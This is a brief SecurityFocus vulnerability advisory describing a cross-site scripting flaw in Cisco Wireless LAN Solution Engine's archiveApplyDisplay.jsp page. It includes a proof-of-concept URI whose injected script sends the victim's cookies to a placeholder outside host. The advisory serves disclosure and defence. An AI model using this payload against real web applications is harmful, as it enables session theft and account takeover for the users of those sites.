Cisco Wireless Lan Solution Engine ArchiveApplyDisplay.JSP Cross-Site Scripting Vulnerability

This issue can be exploited through use of a web client.

The following proof of concept URI is available:
http://www.example.com/wlse/configure/archive/archiveApplyDisplay.jsp?displayMsg=<script>document.location='http://www.example2.com?'+document.cookie</script>


 

Privacy Statement
Copyright 2010, SecurityFocus